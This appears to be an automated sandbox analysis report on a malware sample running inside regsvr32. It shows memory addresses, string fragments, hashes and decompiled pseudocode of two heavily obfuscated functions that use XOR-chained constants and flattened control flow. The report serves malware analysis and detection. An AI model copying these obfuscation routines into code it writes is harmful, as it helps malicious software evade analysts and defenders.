0x04b477ef
0x04b477f1
0x04b477f1
0x04b47841
0x04b47858
0x04b4785d
0x04b47860
0x04b47862
0x04b47910
0x00000000
0x04b47868
0x04b4788b
0x04b47892
0x04b47897
0x04b4789a
0x04b4789c
0x04b478c6
0x04b478d6
0x04b478d6
0x04b478d6
0x04b478fe
0x04b47903
0x04b47903
0x04b47906
0x00000000
0x04b47906
0x04b476bd
0x04b476bd
0x04b476c3
0x04b47763
0x04b4776a
0x00000000
0x04b476c9
0x04b476c9
0x04b476cf
0x04b4793e
0x04b476d5
0x04b476d5
0x04b476db
0x04b476f3
0x04b476f5
0x04b476f7
0x04b47705
0x04b47705
0x04b476f9
0x04b47700
0x04b47700
0x04b47707
0x04b4772c
0x04b47731
0x04b47736
0x04b4773e
0x00000000
0x04b476dd
0x04b476dd
0x04b476e3
0x00000000
0x04b476e9
0x04b476e9
0x00000000
0x04b476e9
0x04b476e3
0x04b476db
0x04b476cf
0x04b476c3
0x00000000
0x04b476b7
0x04b47516

Strings

!, xrefs: 04B4747A
^, xrefs: 04B4706B
OI, xrefs: 04B47058
&B, xrefs: 04B46E80
n3u, xrefs: 04B4692C
LG, xrefs: 04B46892
2 ], xrefs: 04B472F0
OHR, xrefs: 04B47171
H#, xrefs: 04B473B6
c', xrefs: 04B46EF2
)fVX, xrefs: 04B468B3
=o, xrefs: 04B46F70
R<, xrefs: 04B46DC0

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: c'$!$&B$)fVX$2 ]$LG$OHR$OI$R<$n3u$=o$H#$^
API String ID: 0-4090907037
Opcode ID: 9309b5871c78c9717406e0fde72c6701b9c1bbc53ea0efe612efc54403f59f7d
Instruction ID: 0e65e0889ebc3b2a3ea7b6f459e92da57fd05ec4344107e157f2cd8d0b05829b
Opcode Fuzzy Hash: 9309b5871c78c9717406e0fde72c6701b9c1bbc53ea0efe612efc54403f59f7d
Instruction Fuzzy Hash: CC92FDB1509381CFE3B9CF25C58AA8BBBE1FBC4308F00891DE5D996260D7B59949DF42

Uniqueness

Uniqueness Score: -1.00%

Function 04B4A474, Relevance: 15.4, Strings: 12, Instructions: 357
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B4A474(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t422;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				void* _t487;
				void* _t488;
				signed int* _t492;

				_t492 =  &_v2792;
				_t487 = __ecx;
				_v2736 = 0xa43fec;
				_v2736 = _v2736 + 0xffff66c9;
				_v2736 = _v2736 >> 0xc;
				_v2736 = _v2736 ^ 0x00000a13;
				_v2788 = 0xca245c;
				_v2788 = _v2788 + 0xc295;
				_v2788 = _v2788 << 6;
				_v2788 = _v2788 + 0xffff0e49;
				_v2788 = _v2788 ^ 0x32b58b6e;
				_v2660 = 0x35f9ef;
				_v2660 = _v2660 << 0xe;
				_v2660 = _v2660 ^ 0x7e7543bd;
				_v2688 = 0x437073;
				_v2688 = _v2688 >> 0xe;
				_v2688 = _v2688 ^ 0xf2a4f008;
				_v2688 = _v2688 ^ 0xf2aac2be;
				_v2700 = 0x2c6eea;
				_v2700 = _v2700 >> 1;
				_v2700 = _v2700 | 0x2b7eca56;
				_v2700 = _v2700 ^ 0x2b78a774;
				_v2676 = 0xafd7a5;
				_v2676 = _v2676 >> 0xb;
				_v2676 = _v2676 ^ 0x0002223f;
				_v2740 = 0x8278b2;
				_v2740 = _v2740 << 6;
				_v2740 = _v2740 << 1;
				_v2740 = _v2740 ^ 0x4136a23a;
				_v2612 = 0x7f4f91;
				_v2612 = _v2612 + 0xffff9116;
				_v2612 = _v2612 ^ 0x007102c2;
				_v2668 = 0x4461fd;
				_v2668 = _v2668 * 0x27;
				_v2668 = _v2668 ^ 0x0a629f7c;
				_t488 = 0x219adc7;
				_v2756 = 0xa77258;
				_v2756 = _v2756 >> 2;
				_v2756 = _v2756 + 0x9d81;
				_t444 = 0x54;
				_v2756 = _v2756 * 0x70;
				_v2756 = _v2756 ^ 0x12998c8c;
				_v2628 = 0x3fd810;
				_v2628 = _v2628 + 0xfffff92f;
				_v2628 = _v2628 ^ 0x003ee59a;
				_v2780 = 0x9fe7be;
				_v2780 = _v2780 + 0xaec4;
				_v2780 = _v2780 << 0x10;
				_v2780 = _v2780 >> 2;
				_v2780 = _v2780 ^ 0x25a64a78;
				_v2620 = 0xbf1dbc;
				_v2620 = _v2620 + 0xffff98cb;
				_v2620 = _v2620 ^ 0x00bd158d;
				_v2732 = 0xa8760d;
				_v2732 = _v2732 << 8;
				_v2732 = _v2732 + 0xa9d7;
				_v2732 = _v2732 ^ 0xa87dd804;
				_v2684 = 0xb5ab85;
				_v2684 = _v2684 / _t444;
				_v2684 = _v2684 ^ 0x0004fa7b;
				_v2708 = 0x9eabf6;
				_t445 = 0x4f;
				_v2708 = _v2708 / _t445;
				_v2708 = _v2708 ^ 0xed59372e;
				_v2708 = _v2708 ^ 0xed517486;
				_v2608 = 0x5ae525;
				_v2608 = _v2608 * 0x4c;
				_v2608 = _v2608 ^ 0x1afb43af;
				_v2644 = 0xaf8ee5;
				_v2644 = _v2644 ^ 0xf4d3cb8d;
				_v2644 = _v2644 ^ 0xf47b6f68;
				_v2604 = 0xc38975;
				_v2604 = _v2604 >> 0xf;
				_v2604 = _v2604 ^ 0x000b5702;
				_v2652 = 0x27ffed;
				_v2652 = _v2652 + 0x9a12;
				_v2652 = _v2652 ^ 0x002af41d;
				_v2616 = 0x7935fe;
				_v2616 = _v2616 + 0x1306;
				_v2616 = _v2616 ^ 0x007d2870;
				_v2692 = 0x7d1b3a;
				_t446 = 0x7d;
				_v2692 = _v2692 * 0x5a;
				_v2692 = _v2692 * 0x29;
				_v2692 = _v2692 ^ 0x0b423dcb;
				_v2724 = 0xbe8a04;
				_v2724 = _v2724 * 0x27;
				_v2724 = _v2724 | 0x44bf91fe;
				_v2724 = _v2724 ^ 0x5dbe7768;
				_v2636 = 0x66ae7e;
				_v2636 = _v2636 + 0xffff18a5;
				_v2636 = _v2636 ^ 0x006a6401;
				_v2744 = 0x24afb7;
				_v2744 = _v2744 + 0xf221;
				_v2744 = _v2744 >> 2;
				_v2744 = _v2744 ^ 0x00088a95;
				_v2716 = 0x4884b4;
				_v2716 = _v2716 | 0xbbb03a66;
				_v2716 = _v2716 ^ 0xe76b33e5;
				_v2716 = _v2716 ^ 0x5c9d38b7;
				_v2672 = 0xd2ae7f;
				_v2672 = _v2672 / _t446;
				_v2672 = _v2672 ^ 0x00034be9;
				_v2680 = 0x28809f;
				_v2680 = _v2680 << 8;
				_v2680 = _v2680 ^ 0x28858fb3;
				_v2720 = 0x2529a6;
				_t447 = 0x60;
				_v2720 = _v2720 / _t447;
				_t448 = 0x55;
				_v2720 = _v2720 / _t448;
				_v2720 = _v2720 ^ 0x00015f05;
				_v2728 = 0xe4ec68;
				_v2728 = _v2728 | 0x076980de;
				_v2728 = _v2728 >> 0x10;
				_v2728 = _v2728 ^ 0x00066f44;
				_v2764 = 0x25662b;
				_v2764 = _v2764 + 0x352e;
				_v2764 = _v2764 + 0xd238;
				_v2764 = _v2764 >> 9;
				_v2764 = _v2764 ^ 0x0003808d;
				_v2696 = 0xd79a4d;
				_v2696 = _v2696 >> 0xf;
				_v2696 = _v2696 | 0xe296257b;
				_v2696 = _v2696 ^ 0xe2941eeb;
				_v2704 = 0x8f07c6;
				_v2704 = _v2704 << 6;
				_v2704 = _v2704 << 0xb;
				_v2704 = _v2704 ^ 0x0f8cdb18;
				_v2772 = 0x165ad0;
				_v2772 = _v2772 * 0x45;
				_v2772 = _v2772 * 0xe;
				_v2772 = _v2772 | 0xc27a990b;
				_v2772 = _v2772 ^ 0xd67b0e5a;
				_v2712 = 0x3a0787;
				_v2712 = _v2712 << 9;
				_v2712 = _v2712 << 3;
				_v2712 = _v2712 ^ 0xa0756bb8;
				_v2768 = 0xd1f7d1;
				_v2768 = _v2768 ^ 0x28b4518a;
				_v2768 = _v2768 ^ 0x2c50bf5e;
				_v2768 = _v2768 << 1;
				_v2768 = _v2768 ^ 0x086bcac7;
				_v2664 = 0x43880;
				_v2664 = _v2664 << 2;
				_v2664 = _v2664 ^ 0x001745f4;
				_v2776 = 0x99bfba;
				_v2776 = _v2776 + 0xb20b;
				_v2776 = _v2776 ^ 0x9325107f;
				_v2776 = _v2776 ^ 0x1bb55bce;
				_v2776 = _v2776 ^ 0x880f35ab;
				_v2784 = 0xcf6f67;
				_v2784 = _v2784 | 0xe7eb8da5;
				_t449 = 0x69;
				_v2784 = _v2784 * 5;
				_v2784 = _v2784 >> 0xc;
				_v2784 = _v2784 ^ 0x000ae4cd;
				_v2792 = 0x938e6a;
				_v2792 = _v2792 * 0x34;
				_v2792 = _v2792 + 0xd82d;
				_v2792 = _v2792 + 0xffff3001;
				_v2792 = _v2792 ^ 0x1dfcfd52;
				_v2640 = 0x59feb;
				_v2640 = _v2640 + 0xffffbab8;
				_v2640 = _v2640 ^ 0x000de14c;
				_v2760 = 0x4f2f51;
				_v2760 = _v2760 << 3;
				_v2760 = _v2760 | 0xca7d0b31;
				_v2760 = _v2760 >> 5;
				_v2760 = _v2760 ^ 0x06504f0f;
				_v2648 = 0x12de1c;
				_v2648 = _v2648 << 2;
				_v2648 = _v2648 ^ 0x0044c65b;
				_v2656 = 0xedb7d1;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x00060f5a;
				_v2624 = 0x25ed17;
				_v2624 = _v2624 << 8;
				_v2624 = _v2624 ^ 0x25e602f4;
				_v2632 = 0xdb105d;
				_v2632 = _v2632 + 0xbf07;
				_v2632 = _v2632 ^ 0x00d56ea2;
				_v2752 = 0xdb9922;
				_v2752 = _v2752 + 0xffff5c98;
				_t422 = _v2752 / _t449;
				_v2752 = _t422;
				_v2752 = _v2752 + 0xe0a7;
				_v2752 = _v2752 ^ 0x000f564b;
				_v2748 = 0x373105;
				_v2748 = _v2748 + 0xffff8875;
				_v2748 = _v2748 | 0xab9c3c2b;
				_v2748 = _v2748 ^ 0xabbdde7d;
				while(_t488 != 0x219adc7) {
					if(_t488 == 0x472b880) {
						E04B31A34(_v2672,  &_v1040, _t449, _t449, _v2680, _v2720, _v2728, _t449, _v2736, _v2764);
						_push(_v2712);
						_push(_v2772);
						_push(_v2704);
						E04B52D0A(_v2664, __eflags,  &_v2080, _v2776, _v2784, _v2792, 0x4b3192c,  &_v520,  &_v1040, E04B4E1F8(0x4b3192c, _v2696, __eflags));
						E04B4FECB(_t424, _v2640, _v2760, _v2648, _v2656);
						__eflags = 0;
						return E04B485FF(_v2624, _v2632, 0, 0,  &_v520, 0, _v2752, 0, _v2748);
					}
					_t500 = _t488 - 0x6430241;
					if(_t488 != 0x6430241) {
						L7:
						__eflags = _t488 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t422;
						}
						L10:
						return _t422;
					}
					E04B50DB1(_v2788,  &_v2600, _t500, _v2660, _t449, _v2688);
					 *((short*)(E04B409DD(_v2700,  &_v2600, _v2676, _v2740))) = 0;
					L04B3BAA9(_v2612, _v2668, _t500, _v2756, _v2628,  &_v1560);
					_push(_v2684);
					_push(_v2732);
					_push(_v2620);
					E04B52D0A(_v2608, _t500,  &_v1560, _v2644, _v2604, _v2652, 0x4b3188c,  &_v2080,  &_v2600, E04B4E1F8(0x4b3188c, _v2780, _t500));
					E04B4FECB(_t436, _v2616, _v2692, _v2724, _v2636);
					_t449 = _v2744;
					_t422 = E04B3BFBE( &_v2080, _t487, _v2716);
					_t492 =  &(_t492[0x18]);
					if(_t422 != 0) {
						_t488 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t488 = 0x6430241;
				goto L7;
			}

0x04b4a474
0x04b4a47e
0x04b4a480
0x04b4a48a
0x04b4a492
0x04b4a497
0x04b4a49f
0x04b4a4a7
0x04b4a4af
0x04b4a4b4
0x04b4a4bc
0x04b4a4c4
0x04b4a4cf
0x04b4a4d7
0x04b4a4e2
0x04b4a4ea
0x04b4a4ef
0x04b4a4f7
0x04b4a4ff
0x04b4a507
0x04b4a50b
0x04b4a513
0x04b4a51b
0x04b4a526
0x04b4a52e
0x04b4a539
0x04b4a541
0x04b4a546
0x04b4a54a
0x04b4a552
0x04b4a55d
0x04b4a568
0x04b4a573
0x04b4a586
0x04b4a58d
0x04b4a598
0x04b4a59d
0x04b4a5a5
0x04b4a5aa
0x04b4a5b9
0x04b4a5bc
0x04b4a5c0
0x04b4a5c8
0x04b4a5d3
0x04b4a5de
0x04b4a5e9
0x04b4a5f1
0x04b4a5f9
0x04b4a5fe
0x04b4a603
0x04b4a60b
0x04b4a616
0x04b4a621
0x04b4a62c
0x04b4a634
0x04b4a639
0x04b4a641
0x04b4a649
0x04b4a65f
0x04b4a666
0x04b4a671
0x04b4a67d
0x04b4a680
0x04b4a684
0x04b4a68c
0x04b4a694
0x04b4a6a7
0x04b4a6ae
0x04b4a6bb
0x04b4a6c6
0x04b4a6d1
0x04b4a6dc
0x04b4a6e7
0x04b4a6ef
0x04b4a6fa
0x04b4a705
0x04b4a710
0x04b4a71b
0x04b4a726
0x04b4a731
0x04b4a73c
0x04b4a74b
0x04b4a74e
0x04b4a757
0x04b4a75b
0x04b4a763
0x04b4a770
0x04b4a774
0x04b4a77c
0x04b4a784
0x04b4a78f
0x04b4a79a
0x04b4a7a5
0x04b4a7ad
0x04b4a7b5
0x04b4a7ba
0x04b4a7c2
0x04b4a7ca
0x04b4a7d2
0x04b4a7da
0x04b4a7e2
0x04b4a7f8
0x04b4a7ff
0x04b4a80a
0x04b4a815
0x04b4a81d
0x04b4a828
0x04b4a834
0x04b4a839
0x04b4a843
0x04b4a846
0x04b4a84a
0x04b4a852
0x04b4a85a
0x04b4a862
0x04b4a867
0x04b4a86f
0x04b4a877
0x04b4a87f
0x04b4a887
0x04b4a88c
0x04b4a894
0x04b4a89c
0x04b4a8a1
0x04b4a8a9
0x04b4a8b1
0x04b4a8b9
0x04b4a8be
0x04b4a8c3
0x04b4a8cb
0x04b4a8d8
0x04b4a8e1
0x04b4a8e7
0x04b4a8f4
0x04b4a901
0x04b4a909
0x04b4a90e
0x04b4a913
0x04b4a91b
0x04b4a923
0x04b4a92b
0x04b4a933
0x04b4a937
0x04b4a93f
0x04b4a94a
0x04b4a952
0x04b4a95d
0x04b4a965
0x04b4a96d
0x04b4a975
0x04b4a97d
0x04b4a985
0x04b4a98d
0x04b4a99c
0x04b4a99d
0x04b4a9a1
0x04b4a9a6
0x04b4a9ae
0x04b4a9bb
0x04b4a9bf
0x04b4a9c7
0x04b4a9cf
0x04b4a9d7
0x04b4a9e2
0x04b4a9ed
0x04b4a9f8
0x04b4aa00
0x04b4aa05
0x04b4aa0d
0x04b4aa12
0x04b4aa1a
0x04b4aa25
0x04b4aa2d
0x04b4aa38
0x04b4aa43
0x04b4aa4b
0x04b4aa56
0x04b4aa61
0x04b4aa69
0x04b4aa74
0x04b4aa7f
0x04b4aa8a
0x04b4aa95
0x04b4aa9d
0x04b4aaa9
0x04b4aaab
0x04b4aaaf
0x04b4aab7
0x04b4aabf
0x04b4aac7
0x04b4aacf
0x04b4aad7
0x04b4aadf
0x04b4aaed
0x04b4ac4c
0x04b4ac51
0x04b4ac5d
0x04b4ac61
0x04b4acaa
0x04b4acca
0x04b4acd9
0x00000000
0x04b4acfa
0x04b4aaf3
0x04b4aaf5
0x04b4ac13
0x04b4ac13
0x04b4ac19
0x00000000
0x00000000
0x00000000
0x00000000
0x04b4ad07
0x04b4ad07
0x04b4ad07
0x04b4ab12
0x04b4ab37
0x04b4ab5b
0x04b4ab60
0x04b4ab6c
0x04b4ab70
0x04b4abc2
0x04b4abe2
0x04b4abee
0x04b4abfa
0x04b4abff
0x04b4ac04
0x04b4ac0a
0x00000000
0x04b4ac0a
0x00000000
0x04b4ac04
0x04b4ac11
0x00000000

Strings

.7Y, xrefs: 04B4A684
%Z, xrefs: 04B4A694
.5, xrefs: 04B4A877
3k, xrefs: 04B4A7D2
spC, xrefs: 04B4A4E2
Q/O, xrefs: 04B4A9F8
L, xrefs: 04B4A9ED
h, xrefs: 04B4A852
p(}, xrefs: 04B4A731
n,, xrefs: 04B4A4FF
+f%, xrefs: 04B4A86F
$P, xrefs: 04B4A47C

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$%Z$+f%$.5$.7Y$L$Q/O$h$p(}$spC$3k$n,
API String ID: 0-500290626
Opcode ID: 93ecc3e6edec75befad98932168b5640080a0cd2b8f25064a927491a2c898176
Instruction ID: 720fa7c9ec0f71cdf5d68c28c43e2cf81a1144b1aebb620ab8ce51bb60f19cd5
Opcode Fuzzy Hash: 93ecc3e6edec75befad98932168b5640080a0cd2b8f25064a927491a2c898176
Instruction Fuzzy Hash: 5712E1714093809FE3A9CF60C989A8BFBE1FBC4348F108A1DE1DA96260D7B59549CF57

Uniqueness

Uniqueness Score: -1.00%

Function 04B4D1BC, Relevance: 15.3, Strings: 12, Instructions: 347
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E04B4D1BC(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				char _v268;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				void* _t309;
				void* _t322;
				intOrPtr _t325;
				intOrPtr _t328;
				intOrPtr _t332;
				void* _t336;
				intOrPtr _t338;
				intOrPtr _t340;
				intOrPtr _t341;
				void* _t343;
				intOrPtr _t346;
				void* _t349;
				intOrPtr _t364;
				intOrPtr _t365;
				void* _t382;
				intOrPtr _t385;
				void* _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				intOrPtr _t394;
				void* _t395;
				void* _t396;
				void* _t397;
				void* _t399;

				_push(_a24);
				_t395 = __edx;
				_push(_a20);
				_v288 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(__ecx);
				_v312 = 0xeda4ef;
				_t397 = _t396 + 0x20;
				_v312 = _v312 + 0x7c87;
				_v312 = _v312 ^ 0x00e6bc42;
				_t346 = 0;
				_v356 = 0x83a7cc;
				_t349 = 0x902256d;
				_v356 = _v356 << 0xd;
				_v356 = _v356 | 0xd496e6a5;
				_v356 = _v356 ^ 0xf4f8676c;
				_v388 = 0x254bab;
				_v388 = _v388 | 0x2708e00f;
				_v388 = _v388 << 0xc;
				_v388 = _v388 << 0xa;
				_v388 = _v388 ^ 0xebca5aa3;
				_v376 = 0x3a43eb;
				_v376 = _v376 + 0x5e30;
				_v376 = _v376 ^ 0x2d5dec97;
				_v376 = _v376 ^ 0x2d6492cf;
				_v324 = 0x965e68;
				_v324 = _v324 ^ 0x4fad172c;
				_v324 = _v324 ^ 0x4f30eea0;
				_v404 = 0x95ea8f;
				_t391 = 0x3c;
				_v404 = _v404 / _t391;
				_v404 = _v404 << 0xc;
				_v404 = _v404 | 0x93230375;
				_v404 = _v404 ^ 0xb7f3bbc9;
				_v296 = 0x950835;
				_v296 = _v296 + 0xffff217e;
				_v296 = _v296 ^ 0x0090010d;
				_v412 = 0x146e3b;
				_v412 = _v412 ^ 0xfee339d3;
				_v412 = _v412 | 0x08dab50c;
				_v412 = _v412 << 5;
				_v412 = _v412 ^ 0xdff21b2d;
				_v316 = 0x73cd3;
				_v316 = _v316 << 0xb;
				_v316 = _v316 ^ 0x39e53ce3;
				_v304 = 0x17d1c9;
				_v304 = _v304 | 0x32076b61;
				_v304 = _v304 ^ 0x32193df4;
				_v400 = 0xe22ffc;
				_v400 = _v400 * 0xf;
				_v400 = _v400 << 8;
				_v400 = _v400 >> 5;
				_v400 = _v400 ^ 0x020db90e;
				_v360 = 0x4e823d;
				_v360 = _v360 >> 7;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0x000f4c82;
				_v332 = 0x37cdc;
				_v332 = _v332 >> 0xe;
				_v332 = _v332 ^ 0x000cfe6d;
				_v392 = 0x36521e;
				_v392 = _v392 << 2;
				_v392 = _v392 ^ 0x01f25d84;
				_v392 = _v392 + 0xffff6602;
				_v392 = _v392 ^ 0x0122fac3;
				_v292 = 0x811559;
				_v292 = _v292 ^ 0x63e4ed2d;
				_v292 = _v292 ^ 0x636b0aa2;
				_v408 = 0xc9a98b;
				_v408 = _v408 ^ 0x273a7ab7;
				_t392 = 0x3d;
				_v408 = _v408 / _t392;
				_v408 = _v408 | 0xd16a0a28;
				_v408 = _v408 ^ 0xd1e35630;
				_v352 = 0x4de238;
				_v352 = _v352 ^ 0xe481f79a;
				_v352 = _v352 ^ 0xe4c0c54b;
				_v340 = 0x7e756a;
				_v340 = _v340 << 0xb;
				_v340 = _v340 ^ 0xf3ae0159;
				_v384 = 0x3029be;
				_v384 = _v384 + 0x835e;
				_v384 = _v384 ^ 0x9e5eea44;
				_v384 = _v384 ^ 0x9e65521f;
				_v364 = 0xcf8251;
				_v364 = _v364 + 0xffff400c;
				_t393 = 0x78;
				_v364 = _v364 * 0x5a;
				_v364 = _v364 ^ 0x48b0c21e;
				_v320 = 0x2b8f03;
				_v320 = _v320 << 7;
				_v320 = _v320 ^ 0x15cafa02;
				_v372 = 0xb0a86a;
				_v372 = _v372 ^ 0x35b8bfe6;
				_v372 = _v372 ^ 0xed8d6bf1;
				_v372 = _v372 ^ 0xd88344ec;
				_v344 = 0x8c38;
				_v344 = _v344 ^ 0x1ac013b0;
				_v344 = _v344 ^ 0x1ac5368a;
				_v348 = 0x2c1ac3;
				_v348 = _v348 >> 6;
				_v348 = _v348 ^ 0x0005c30d;
				_v300 = 0x3ae4ba;
				_v300 = _v300 >> 0xe;
				_v300 = _v300 ^ 0x00012364;
				_v396 = 0xe1901;
				_v396 = _v396 << 0xe;
				_v396 = _v396 + 0x39a8;
				_v396 = _v396 ^ 0x864e7189;
				_v368 = 0xe5c11e;
				_t394 = _v288;
				_v368 = _v368 / _t393;
				_v368 = _v368 | 0x7320cec6;
				_v368 = _v368 ^ 0x73273aba;
				_v336 = 0xf33546;
				_v336 = _v336 ^ 0x37961faf;
				_v336 = _v336 ^ 0x37663e0b;
				_v328 = 0x922129;
				_v328 = _v328 | 0xf90cd049;
				_v328 = _v328 ^ 0xf99851f2;
				_v416 = 0x9fd52c;
				_v416 = _v416 << 2;
				_v416 = _v416 * 0x22;
				_v416 = _v416 + 0xffff9e7e;
				_v416 = _v416 ^ 0x54e779e0;
				_v380 = 0x615361;
				_v380 = _v380 >> 1;
				_v380 = _v380 + 0x673e;
				_v380 = _v380 ^ 0x003e049c;
				_v308 = 0x9da5c1;
				_v308 = _v308 + 0xf72;
				_v308 = _v308 ^ 0x009db133;
				while(1) {
					L1:
					_t309 = 0xe35a561;
					do {
						while(1) {
							L2:
							_t399 = _t349 - 0x8816d6a;
							if(_t399 > 0) {
								break;
							}
							if(_t399 == 0) {
								_t325 =  *0x4b56228; // 0x0
								_t328 =  *0x4b56228; // 0x0
								_t332 =  *0x4b56228; // 0x0
								_t336 = E04B467E6(_t394, _v400, _v360, _v332, _v392,  &_v268,  *( *((intOrPtr*)(_t332 + 4)) + 0x14) & 0x0000ffff, _v292,  &_v276,  *( *((intOrPtr*)(_t328 + 4)) + 0x44) & 0x0000ffff, _v408,  *((intOrPtr*)(_t325 + 4)) + 0x20, _v352,  &_v260);
								_t397 = _t397 + 0x30;
								if(_t336 == 0) {
									L25:
									_t349 = 0xc732dcb;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								} else {
									_t349 = 0x772d3d2;
									while(1) {
										L1:
										_t309 = 0xe35a561;
										goto L2;
									}
								}
							} else {
								if(_t349 == 0x200f7b2) {
									if(_v280 >= _v308) {
										_t338 = E04B42E5D( &_v284,  &_v276);
									} else {
										_t338 = E04B380C0( &_v284);
									}
									_t394 = _t338;
									_t309 = 0xe35a561;
									_t349 =  !=  ? 0xe35a561 : 0xc732dcb;
									continue;
								} else {
									if(_t349 == 0x323c58a) {
										_t364 =  *0x4b56228; // 0x0
										_t340 =  *((intOrPtr*)( *((intOrPtr*)(_t364 + 4)) + 0x18));
										 *((intOrPtr*)(_t364 + 0x1c)) =  *((intOrPtr*)(_t364 + 0x1c)) + 1;
										_t385 =  *((intOrPtr*)(_t364 + 0x1c));
										 *((intOrPtr*)(_t364 + 4)) = _t340;
										if(_t340 == 0) {
											 *((intOrPtr*)(_t364 + 4)) =  *((intOrPtr*)(_t364 + 0x14));
										}
										_t341 =  *0x4b56228; // 0x0
										if(_t385 >=  *((intOrPtr*)(_t341 + 0x18))) {
											_t365 =  *0x4b56228; // 0x0
											 *(_t365 + 0x1c) =  *(_t365 + 0x1c) & 0x00000000;
										} else {
											_t349 = 0x902256d;
											while(1) {
												L1:
												_t309 = 0xe35a561;
												goto L2;
											}
										}
									} else {
										if(_t349 == 0x54cb160) {
											_t343 = E04B45779( &_v284, _t395, _v388, _v376, _v288);
											_t397 = _t397 + 0xc;
											if(_t343 != 0) {
												_t349 = 0x200f7b2;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										} else {
											if(_t349 != 0x772d3d2) {
												goto L35;
											} else {
												if(L04B36B7A(_v340, _a16, _v384,  &_v268) == 0) {
													_t390 = 0x323c58a;
												} else {
													_t390 = 0x72c7f38;
													_t346 = 1;
												}
												_t349 = 0x939e27d;
												while(1) {
													L1:
													_t309 = 0xe35a561;
													goto L2;
												}
											}
										}
									}
								}
							}
							L38:
							return _t346;
						}
						if(_t349 == 0x902256d) {
							_t394 = 0;
							E04B4FE2A(_v312, _v356, 0x100,  &_v260);
							_v276 = 0;
							_t349 = 0x54cb160;
							_v272 = 0;
							_v284 = 0;
							_v280 = 0;
							goto L34;
						} else {
							if(_t349 == 0x939e27d) {
								L04B52B09(_v364, _v268, _v320, _v372);
								goto L25;
							} else {
								if(_t349 == 0xc732dcb) {
									L04B52B09(_v344, _v284, _v348, _v300);
									L04B52B09(_v396, _t394, _v368, _v336);
									L04B52B09(_v328, _v276, _v416, _v380);
									_t397 = _t397 + 0x18;
									_t349 = _t390;
									L34:
									_t309 = 0xe35a561;
									goto L35;
								} else {
									if(_t349 != _t309) {
										goto L35;
									} else {
										_push(_t349);
										_push(_t349);
										_t322 = E04B4CCA0(1, 0x40);
										_push( &_v260);
										_push(_t322);
										_push(_v304);
										_t382 = 0xb;
										E04B3E404(_v316, _t382);
										_t397 = _t397 + 0x1c;
										_t349 = 0x8816d6a;
										goto L1;
									}
								}
							}
						}
						goto L38;
						L35:
					} while (_t349 != 0x72c7f38);
					goto L38;
				}
			}

0x04b4d1c6
0x04b4d1cd
0x04b4d1d1
0x04b4d1d8
0x04b4d1df
0x04b4d1e6
0x04b4d1ed
0x04b4d1f4
0x04b4d1fb
0x04b4d1fc
0x04b4d1fd
0x04b4d202
0x04b4d20d
0x04b4d210
0x04b4d21a
0x04b4d222
0x04b4d224
0x04b4d22c
0x04b4d231
0x04b4d236
0x04b4d23e
0x04b4d246
0x04b4d24e
0x04b4d256
0x04b4d25b
0x04b4d260
0x04b4d268
0x04b4d270
0x04b4d278
0x04b4d280
0x04b4d288
0x04b4d290
0x04b4d298
0x04b4d2a0
0x04b4d2ae
0x04b4d2b1
0x04b4d2b5
0x04b4d2ba
0x04b4d2c2
0x04b4d2ca
